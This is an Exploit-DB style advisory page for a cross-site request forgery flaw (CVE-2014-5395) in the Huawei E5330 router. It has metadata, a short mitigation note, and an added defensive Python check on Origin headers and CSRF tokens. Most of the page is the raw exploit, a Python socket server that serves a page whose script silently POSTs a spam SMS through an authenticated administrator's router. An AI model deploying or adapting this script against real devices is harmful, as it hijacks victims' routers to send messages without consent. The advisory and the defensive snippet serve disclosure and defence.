Vendor: E5330
By: Nathu Nandwani
CVSS: 7.5 (HIGH)
CWE: 352 (Cross-Site Request Forgery)
Product Name: E5330
Affected Version From: 21.210.09.00.158
Affected Version To: 21.210.09.00.158
Patch Exists: YES
Related CVE: CVE-2014-5395
CPE: h:huawei:e5330
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 x64
2019

Huawei E5330 Cross-Site Request Forgery (Send SMS)

This exploit allows an attacker to send a malicious SMS from a Huawei E5330 router to a receiving phone number. It works only if the administrator who opens the attacker's URL is authenticated to the router. The page served at that URL uses XMLHttpRequest to send a POST request to the router's API with the receiving phone number and the malicious SMS text. The exploit also sets the date of the SMS to the current date and time.

Mitigation:

The administrator should not open any suspicious URLs. The router should be updated to the latest version.
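
The control whose absence makes this request forgeable, as an added example (not code from this advisory or from Huawei's firmware): a server-side check that a state-changing call such as POST /api/sms/send-sms originates from the router's own web UI and carries a per-session token. The header name `x-csrf-token` and all function names are assumptions; the sample requests are constructed.

```python
import hmac
import secrets
from urllib.parse import urlsplit

ROUTER_ORIGINS = {"http://192.168.8.1"}  # router address used on this page
TOKEN_HEADER = "x-csrf-token"            # hypothetical header name
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def new_session_token():
    """Per-session secret that only the router's own pages can read."""
    return secrets.token_urlsafe(32)


def source_origin(headers):
    """Return scheme://host[:port] from Origin, falling back to Referer."""
    value = headers.get("origin") or headers.get("referer")
    if not value or value == "null":
        return None
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def check_request(method, headers, session_token):
    """Return (allowed, reason). Header names are expected in lowercase."""
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    # A session cookie alone proves nothing: the browser attaches it to
    # cross-site requests too, and a string-body XHR POST needs no preflight.
    origin = source_origin(headers)
    if origin not in ROUTER_ORIGINS:
        return False, f"cross-origin request from {origin}"
    supplied = headers.get(TOKEN_HEADER, "")
    if not session_token or not hmac.compare_digest(
            supplied.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "same origin with valid token"


# Constructed sample requests to /api/sms/send-sms (not captured traffic).
TOKEN = new_session_token()
FORGED = {"origin": "http://attacker.example", "cookie": "SessionID=constructed"}
LEGIT = {"origin": "http://192.168.8.1", "cookie": "SessionID=constructed",
         TOKEN_HEADER: TOKEN}

if __name__ == "__main__":
    print(check_request("POST", FORGED, TOKEN))  # rejected
    print(check_request("POST", LEGIT, TOKEN))   # accepted
```
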
Source

Exploit-DB raw data:

# Exploit Title: Huawei E5330 Cross-Site Request Forgery (Send SMS)
# Date: 01/07/2019
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co/
# Vendor Homepage: https://consumer.huawei.com/in/mobile-broadband/e5330/
# Version: 21.210.09.00.158
# Tested on: Windows 10 x64
# CVE: CVE-2014-5395
# Note: The administrator who opens the URL should be authenticated.
import socket
import time
 
server_ip = "0.0.0.0"
server_port = 80
 
huawei_ip = "192.168.8.1"
receiving_phone_no = "01234567890"
sms_text = "This is a SPAM text from Huawei E5330"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((server_ip, server_port))
sock.listen(1)
 
print "Currently listening at " + server_ip + ":" + str(server_port)        
 
client, (client_host, client_port) = sock.accept()
 
print "Client connected: " + client_host + ":" + str(client_port)
print ""
print client.recv(1000)
 
client.send('HTTP/1.0 200 OK\r\n')
client.send('Content-Type: text/html\r\n')
client.send('\r\n')

client.send("""
<html>
    <body>
        <script>
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http://""" + huawei_ip + """/api/sms/send-sms", true);
            xhr.send('<?xml version="1.0" encoding="UTF-8"?><request><Index>0</Index><Phones><Phone>""" + receiving_phone_no + """</Phone></Phones><Sca></Sca><Content>""" + sms_text  + """</Content><Length>""" + str(len(sms_text)) + """</Length><Reserved>1</Reserved><Date>""" + time.strftime('%Y-%m-%d %H:%M:%S') + """</Date></request>');
        </script>
    </body>
</html>
""")
 
client.close()
sock.close()